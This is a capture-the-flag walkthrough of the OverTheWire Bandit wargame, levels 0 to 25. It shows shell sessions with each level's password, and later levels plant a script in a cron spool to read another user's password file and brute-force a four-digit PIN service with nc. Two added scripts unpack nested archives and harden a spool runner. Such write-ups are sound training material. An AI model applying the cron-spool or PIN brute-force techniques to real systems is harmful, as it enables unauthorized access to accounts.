Overthewire.org Bandit solutions, levels 0 to 25

Many of you may already know the site overthewire.org. For those who don't, it is a wargame site where you can practice computer security concepts through small challenges. It is organized into challenges of increasing difficulty, the first of which is called Bandit.

The overthewire site describes this challenge as follows: “The Bandit wargame is aimed at absolute beginners. It will teach the basics needed to be able to play other wargames.”

The Bandit solutions follow.

Level 0:

#Connection
stef$ ssh bandit0@bandit.labs.overthewire.org

Level 0 -> 1:

##Solution
bandit0@melinda:~$ cat
boJ9jbbUNNfktd78OOpsqOltutMc3MY1
#Disconnection
bandit0@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 1 -> 2:

stef$ ssh bandit1@bandit.labs.overthewire.org
bandit1@melinda:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 2 -> 3:

stef$ ssh bandit2@bandit.labs.overthewire.org
bandit2@melinda:~$ cat spaces\ in\ this\ filename 
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
bandit2@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 3 -> 4:

stef$ ssh bandit3@bandit.labs.overthewire.org
bandit3@melinda:~$ ls -a inhere/
.  ..  .hidden
bandit3@melinda:~$ cat inhere/.hidden 
pIwrPrtPN36QITSp3EQaw936yaFoFgAB
bandit3@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 4 -> 5:

stef$ ssh bandit4@bandit.labs.overthewire.org
bandit4@melinda:~/inhere$ file ./*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@melinda:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh
bandit4@melinda:~/inhere$ logout
stef$

Level 5 -> 6:

stef$ ssh bandit5@bandit.labs.overthewire.org
bandit5@melinda:~$ cd inhere/
bandit5@melinda:~$ find ./ -size 1033c
./inhere/maybehere07/.file2
bandit5@melinda:~$ cat ./inhere/maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7
bandit5@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 6 -> 7:

stef$ ssh bandit6@bandit.labs.overthewire.org
bandit6@melinda:~$ find / -size 33c -user bandit7 -group bandit6 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@melinda:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
bandit6@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 7 -> 8:

stef$ ssh bandit7@bandit.labs.overthewire.org
bandit7@melinda:~$ cat data.txt | grep millionth
millionth	cvX2JJa4CFALtqS87jk27qwqGhBM9plV
bandit7@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 8 -> 9:

stef$ ssh bandit8@bandit.labs.overthewire.org
bandit8@melinda:~$ sort data.txt | uniq -u
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
bandit8@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 9 -> 10:

stef$ ssh bandit9@bandit.labs.overthewire.org
bandit9@melinda:~$ ls
data.txt
bandit9@melinda:~$ strings data.txt | grep =
epr~F=K
7?YD=
?M=HqAH
/(Ne=
C=_"
I========== the6
z5Y=
`h(8=`
n\H=;
========== password
========== ism
N$=&
l/a=L)
f=C(
========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
ie)=5e
bandit9@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 10 -> 11:

stef$ ssh bandit10@bandit.labs.overthewire.org
bandit10@melinda:~$ ls
data.txt
bandit10@melinda:~$ base64 -d data.txt 
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
bandit10@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 11 -> 12:

stef$ ssh bandit11@bandit.labs.overthewire.org
bandit11@melinda:~$ ls
data.txt
bandit11@melinda:~$ cat data.txt 
Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh
bandit11@melinda:~$ tr 'A-Za-z' 'N-ZA-Mn-za-m' < data.txt 
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
bandit11@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 12 -> 13:

stef$ ssh bandit12@bandit.labs.overthewire.org
bandit12@melinda:/tmp$ cd /tmp
bandit12@melinda:/tmp$ mkdir acc123
bandit12@melinda:/tmp$ cd acc123
bandit12@melinda:/tmp/acc123$ cp /home/bandit12/data.txt ./
bandit12@melinda:/tmp/acc123$ ls
data.txt
#Convert the hexdump back to binary
bandit12@melinda:/tmp/acc123$ xxd -r data.txt > data1.txt
bandit12@melinda:/tmp/acc123$ ls
data.txt  data1.txt
#Use the file command to see what kind of file we are dealing with
bandit12@melinda:/tmp/acc123$ file data1.txt 
data1.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/acc123$ mv data1.txt data2.bin.gz 
bandit12@melinda:/tmp/acc123$ gunzip data2.bin.gz 
bandit12@melinda:/tmp/acc123$ ls
data.txt  data2.bin
bandit12@melinda:/tmp/acc123$ file data2.bin 
data2.bin: bzip2 compressed data, block size = 900k   
bandit12@melinda:/tmp/acc123$ bunzip2 data2.bin
bunzip2: Can't guess original name for data2.bin -- using data2.bin.out
bandit12@melinda:/tmp/acc123$ ls
data.txt  data2.bin.out
bandit12@melinda:/tmp/acc123$ file data2.bin.out 
data2.bin.out: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/acc123$ mv data2.bin.out data4.bin.gz
bandit12@melinda:/tmp/acc123$ gunzip data4.bin.gz 
bandit12@melinda:/tmp/acc123$ ls
data.txt  data4.bin
bandit12@melinda:/tmp/acc123$ file data4.bin 
data4.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/acc123$ tar -xvf data4.bin
data5.bin
bandit12@melinda:/tmp/acc123$ file data5.bin 
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/acc123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/acc123$ file data6.bin 
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/acc123$ bunzip2 data6.bin
bunzip2: Can't guess original name for data6.bin -- using data6.bin.out
bandit12@melinda:/tmp/acc123$ file data6.bin.out 
data6.bin.out: POSIX tar archive (GNU)
bandit12@melinda:/tmp/acc123$ tar -xvf data6.bin.out
data8.bin
bandit12@melinda:/tmp/acc123$ file data8.bin 
data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/acc123$ mv data8.bin data9.bin.gz
bandit12@melinda:/tmp/acc123$ gunzip data9.bin.gz 
bandit12@melinda:/tmp/acc123$ ls
data.txt  data4.bin  data5.bin  data6.bin.out  data9.bin
bandit12@melinda:/tmp/acc123$ file data9.bin 
data9.bin: ASCII text
bandit12@melinda:/tmp/acc123$ cat data9.bin 
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
bandit12@melinda:/tmp/acc123$ logout
Connection to bandit.labs.overthewire.org closed.
stef$
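
The manual file/rename/unpack cycle above can be automated. The following is an added example, not part of the original walkthrough: it recognises gzip, bzip2 and tar layers by their magic bytes, starting from the binary that `xxd -r` produced, and runs on a constructed sample. The function names and the sample file are assumptions made for illustration.

```bash
#!/bin/bash
# Added example: peel nested gzip/bzip2/tar layers by magic bytes.

# Print the container type of FILE: gzip, bzip2, tar or other.
layer_type() {
    local head3 tarmagic
    head3=$(od -An -tx1 -N3 "$1" | tr -d ' \n')
    # A tar header carries the string "ustar" at byte offset 257.
    tarmagic=$(od -An -c -j257 -N5 "$1" 2>/dev/null | tr -d ' \n')
    case "$head3" in
        1f8b*)  echo gzip ;;      # gzip magic: 1f 8b
        425a68) echo bzip2 ;;     # bzip2 magic: "BZh"
        *)      if [ "$tarmagic" = ustar ]; then echo tar; else echo other; fi ;;
    esac
}

# Unpack SRC layer by layer inside WORKDIR, leave the innermost data in
# WORKDIR/payload and print the sequence of layers that was removed.
peel() {
    local src="$1" workdir="$2" cur next kind chain="" depth=0
    cur="$workdir/layer0"
    cp -- "$src" "$cur"
    # Depth cap: a self-reproducing archive would otherwise never terminate.
    while [ "$depth" -lt 32 ]; do
        kind=$(layer_type "$cur")
        if [ "$kind" = other ]; then break; fi
        depth=$((depth + 1))
        next="$workdir/layer$depth"
        case "$kind" in
            gzip)  gzip -dc < "$cur" > "$next" ;;
            bzip2) bzip2 -dc < "$cur" > "$next" ;;
            # Stream the first member to stdout so that member names stored
            # in the archive never decide where files are written.
            tar)   tar -xOf "$cur" "$(tar -tf "$cur" | head -n 1)" > "$next" ;;
        esac
        chain="$chain$kind "
        cur="$next"
    done
    cp -- "$cur" "$workdir/payload"
    echo "${chain% }"
}

# Constructed sample (not the level's data): text -> gzip -> tar -> gzip.
build_sample() {
    local dir="$1"
    printf 'The password is CONSTRUCTED-SAMPLE\n' > "$dir/data9.bin"
    gzip -c "$dir/data9.bin" > "$dir/data8.bin"
    tar -C "$dir" -cf "$dir/data6.tar" data8.bin
    gzip -c "$dir/data6.tar" > "$dir/sample.bin"
}

work=$(mktemp -d)
build_sample "$work"
echo "layers: $(peel "$work/sample.bin" "$work")"
cat "$work/payload"
rm -rf "$work"
```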

Level 13 -> 14:

stef$ ssh bandit13@bandit.labs.overthewire.org
bandit13@melinda:~$ ls
sshkey.private
bandit13@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
#Copy the key to the local computer
stef$ scp bandit13@bandit.labs.overthewire.org:/home/bandit13/sshkey.private ./Cartella/

Level 14 -> 15:

stef$ ssh bandit14@bandit.labs.overthewire.org -i ./Cartella/sshkey.private
bandit14@melinda:~$ cat /etc/bandit_pass/bandit14 
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
#Check whether a service is actually listening on port 30000
bandit14@melinda:~$ netstat -anp | grep 30000
tcp        0      0 0.0.0.0:30000           0.0.0.0:*               LISTEN      - 
#Try connecting to the local server on port 30000
bandit14@melinda:~$ nc localhost 30000
#Try sending the password found earlier
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

bandit14@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
MaKeopti:~ stef$
stef$

Level 15 -> 16:

stef$ ssh bandit15@bandit.labs.overthewire.org
bandit15@melinda:~$ openssl s_client -host localhost -port 30001
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
 0 s:/CN=li190-250.members.linode.com
   i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
[...]
---
No client certificate CA names sent
---
SSL handshake has read 1330 bytes and written 455 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    [...]
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
HEARTBEATING
read R BLOCK
read:errno=0

#As suggested, I use the -quiet option
bandit15@melinda:~$ openssl s_client -host localhost -port 30001 -quiet
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

read:errno=0
bandit15@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 16 -> 17:

stef$ ssh bandit16@bandit.labs.overthewire.org
bandit16@melinda:~$ nmap -Pn -A -p 31000-32000 localhost

Starting Nmap 6.40 ( http://nmap.org ) at 2015-01-17 08:42 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00081s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE VERSION
31046/tcp open  echo
31518/tcp open  msdtc   Microsoft Distributed Transaction Coordinator (error)
31691/tcp open  echo
31790/tcp open  msdtc   Microsoft Distributed Transaction Coordinator (error)
31960/tcp open  echo
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds

#The ports reported as echo services probably won't be useful and could be discarded up front.
#In any case, for completeness, let's try connecting to the first one
bandit16@melinda:~$ openssl s_client -host localhost -port 31046
CONNECTED(00000003)
140737354045088:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:795:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 7 bytes and written 305 bytes
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
---
#All that remains is to focus on ports 31518 and 31790
bandit16@melinda:~$ openssl s_client -host localhost -port 31518
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
 0 s:/CN=li190-250.members.linode.com
   i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
[...]
---
No client certificate CA names sent
---
SSL handshake has read 1330 bytes and written 455 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    [...]
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
cluFn7wTiGryunymYOu4RcffSxQluehd
^C

#All that is left is to try the connection on port 31790

bandit16@melinda:~$ openssl s_client -host localhost -port 31790
CONNECTED(00000003)
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
---
Certificate chain
 0 s:/CN=li190-250.members.linode.com
   i:/CN=li190-250.members.linode.com
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
subject=/CN=li190-250.members.linode.com
issuer=/CN=li190-250.members.linode.com
---
No client certificate CA names sent
---
SSL handshake has read 1330 bytes and written 455 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    [...]
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----

read:errno=0
#Copy the private key to a file so it can be reused in the next level.
#In my case the file will be called sshkey-private17
bandit16@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$ 

Level 17 -> 18:

stef$ ssh bandit17@bandit.labs.overthewire.org -i ./Cartella/sshkey.private17
bandit17@melinda:~$ diff passwords.old passwords.new 
42c42
< BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR
---
> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
#The string we are looking for is the second one shown, marked by the ">" symbol
bandit17@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 18 -> 19:

stef$ ssh bandit18@bandit.labs.overthewire.org
[...]
bandit18@bandit.labs.overthewire.org's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.18.1-x86_64-linode50 x86_64)
[...]

Byebye !
Connection to bandit.labs.overthewire.org closed.
stef$
#With ssh it is possible to run remote commands, using the syntax
#ssh host command
#Ref: http://matt.might.net/articles/ssh-hacks/
stef$ ssh bandit18@bandit.labs.overthewire.org cat readme
[...]
bandit18@bandit.labs.overthewire.org's password: 
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
stef$

Level 19 -> 20:

stef$ ssh bandit19@bandit.labs.overthewire.org
bandit19@melinda:~$ ls
bandit20-do
bandit19@melinda:~$ ./bandit20-do                              
Run a command as another user.
  Example: ./bandit20-do id
bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
bandit19@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 20 -> 21:

#console 1
stef$ ssh bandit20@bandit.labs.overthewire.org
bandit20@melinda:~$ ls
suconnect
bandit20@melinda:~$ ./suconnect 
Usage: ./suconnect 
This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back.

#console 2
stef$ ssh bandit20@bandit.labs.overthewire.org
bandit20@melinda:~$ nc -l 7890

#console 1
bandit20@melinda:~$ netstat -apn | grep 7890
tcp        0      0 0.0.0.0:7890            0.0.0.0:*               LISTEN      4399/nc 
bandit20@melinda:~$ ./suconnect 7890

#Console 2. Send the old password
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

#Console 1
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
bandit20@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
MaKeopti:bing-ip2hosts-0.4 stef$

#Console 2. We receive the reply with the new password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
bandit20@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 21 -> 22:

stef$ ssh bandit21@bandit.labs.overthewire.org
bandit21@melinda:~$ cd /etc/cron.d
bandit21@melinda:/etc/cron.d$ ls
behemoth4_cleanup   manpage3_resetpw_job   natas27_cleanup  sysstat
cron-apt            melinda-stats          php5             vortex0
cronjob_bandit22    natas-session-toucher  semtex0-32       vortex20
cronjob_bandit23    natas-stats            semtex0-64
cronjob_bandit24    natas25_cleanup        semtex0-ppc
leviathan5_cleanup  natas26_cleanup        semtex5
bandit21@melinda:/etc/cron.d$ cat cronjob_bandit22 
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh 
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@melinda:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
bandit21@melinda:/etc/cron.d$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 22 -> 23:

stef$ ssh bandit22@bandit.labs.overthewire.org
bandit22@melinda:~$ cd /etc/cron.d/
bandit22@melinda:/etc/cron.d$ ls
behemoth4_cleanup   manpage3_resetpw_job   natas27_cleanup  sysstat
cron-apt            melinda-stats          php5             vortex0
cronjob_bandit22    natas-session-toucher  semtex0-32       vortex20
cronjob_bandit23    natas-stats            semtex0-64
cronjob_bandit24    natas25_cleanup        semtex0-ppc
leviathan5_cleanup  natas26_cleanup        semtex5
bandit22@melinda:/etc/cron.d$ cat cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh 
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

#Find the value of the mytarget variable
bandit22@melinda:/$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
#Display the file
bandit22@melinda:/$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
bandit22@melinda:/$ logout
Connection to bandit.labs.overthewire.org closed.
stef$

Level 23 -> 24:

stef$ ssh bandit23@bandit.labs.overthewire.org
bandit23@melinda:~$ cd /etc/cron.d
bandit23@melinda:/etc/cron.d$ ls
behemoth4_cleanup   manpage3_resetpw_job   natas27_cleanup  sysstat
cron-apt            melinda-stats          php5             vortex0
cronjob_bandit22    natas-session-toucher  semtex0-32       vortex20
cronjob_bandit23    natas-stats            semtex0-64
cronjob_bandit24    natas25_cleanup        semtex0-ppc
leviathan5_cleanup  natas26_cleanup        semtex5
bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in *;
do
    echo "Handling $i"
    ./$i
    rm -f $i
done


bandit23@melinda:/etc/cron.d$ mkdir /tmp/stef
bandit23@melinda:/etc/cron.d$ cd /tmp/stef
bandit23@melinda:/tmp/stef$ touch script.sh
bandit23@melinda:/tmp/stef$ vi script.sh
#I create a bash script. Below is the cat of the script
bandit23@melinda:/tmp/stef$ cat script.sh 
#!/bin/bash

myname=$(whoami)
myfile="/tmp/stef/password$myname.txt"
echo "The password for user $myname is the following:" > $myfile 
cat /etc/bandit_pass/$myname >> $myfile
#The folder and the files it contains need to be given the appropriate permissions
bandit23@melinda:/tmp/stef$ chmod 777 -R /tmp/stef
bandit23@melinda:/tmp/stef$ ls -l
total 4
-rwx--x--x 1 bandit23 bandit23 178 Jan 18 16:10 script.sh
#Now let's test the script; we should get the info for the user who runs the file,
#for now the user bandit23
bandit23@melinda:/tmp/stef$ ./script.sh 
bandit23@melinda:/tmp/stef$ ls
passwordbandit23.txt  script.sh
bandit23@melinda:/tmp/stef$ cat passwordbandit23.txt 
The password for user bandit23 is the following:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
#At this point everything should be ready to use the script for user bandit24
bandit23@melinda:/tmp/stef$ cp script.sh /var/spool/bandit24/
bandit23@melinda:/tmp/stef$ ls
passwordbandit23.txt  passwordbandit24.txt  script.sh
bandit23@melinda:/tmp/stef$ cat passwordbandit24.txt 
The password for user bandit24 is the following:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@melinda:~$ cd
bandit23@melinda:~$ rm -rf /tmp/stef
bandit23@melinda:~$ logout
Connection to bandit.labs.overthewire.org closed.
stef$
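
The cron job above runs, as bandit24, every file that any user drops into the spool directory. As an added example (not from the original post or from OverTheWire), this is how such a runner could refuse files it should not trust, assuming that only the job's own user is meant to queue scripts. The function names and the temporary spool directory are hypothetical.

```bash
#!/bin/bash
# Added example: a spool runner that only executes files its owner controls.

# Succeed only if DIR is a real directory owned by OWNER that neither the
# group nor other users can write to.
spool_is_safe() {
    local dir="$1" owner="$2"
    [ -d "$dir" ] && [ ! -L "$dir" ] || return 1
    [ -n "$(find "$dir" -maxdepth 0 -user "$owner" ! -perm -020 ! -perm -002)" ]
}

# Print the regular files directly inside DIR that OWNER owns and that nobody
# else can modify. "-type f" also leaves out symlinks planted in the directory.
trusted_scripts() {
    local dir="$1" owner="$2"
    find "$dir" -maxdepth 1 -type f -user "$owner" ! -perm -020 ! -perm -002 | sort
}

# Hardened counterpart of the cron loop: absolute paths instead of an
# unchecked "cd", quoted names, and nothing runs unless both checks pass.
run_spool() {
    local dir="$1" owner="$2" script
    if ! spool_is_safe "$dir" "$owner"; then
        echo "refusing to run jobs from $dir: not private to $owner" >&2
        return 1
    fi
    trusted_scripts "$dir" "$owner" | while IFS= read -r script; do
        echo "Handling $script"
        "$script" < /dev/null || echo "job failed: $script" >&2
        rm -f -- "$script"
    done
}

# Constructed sample spool (hypothetical file names, not the wargame's directory).
demo_spool() {
    local d
    d=$(mktemp -d)
    printf '#!/bin/sh\necho ran-a\n' > "$d/a.sh"; chmod 700 "$d/a.sh"
    printf '#!/bin/sh\necho ran-b\n' > "$d/b.sh"; chmod 777 "$d/b.sh"  # writable by anyone
    ln -s a.sh "$d/c.sh"                                              # symlink, not a regular file
    echo "$d"
}

spool=$(demo_spool)
run_spool "$spool" "$(id -u)"   # handles and removes a.sh only
ls "$spool"                      # b.sh and c.sh are left untouched
rm -rf "$spool"
```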

Level 24 -> 25:

stef$ ssh bandit24@bandit.labs.overthewire.org
#Check that a server is actually listening on the indicated port
bandit24@melinda:~$ netstat -ln | grep 30002
tcp        0      0 0.0.0.0:30002           0.0.0.0:*               LISTEN 
bandit24@melinda:~$ cd /tmp/stef
bandit24@melinda:/tmp/stef$ ls
bandit24@melinda:/tmp/stef$ touch scriptLev24.sh
bandit24@melinda:/tmp/stef$ chmod +x scriptLev24.sh
bandit24@melinda:/tmp/stef$ cat scriptLev24.sh 
#!/bin/bash

lvl23psw="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
outputfile="outputlvl24.txt"
#For more info search "Zero padding"
for i in $(seq -f "%04g" 0 9999)
do
  echo "using code $i" | tee -a $outputfile
  echo "$lvl23psw $i" | nc localhost 30002 | tee -a $outputfile
done

echo "done"
bandit24@melinda:/tmp/stef$ ./scriptLev24.sh
#After some time the script will find the password:
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
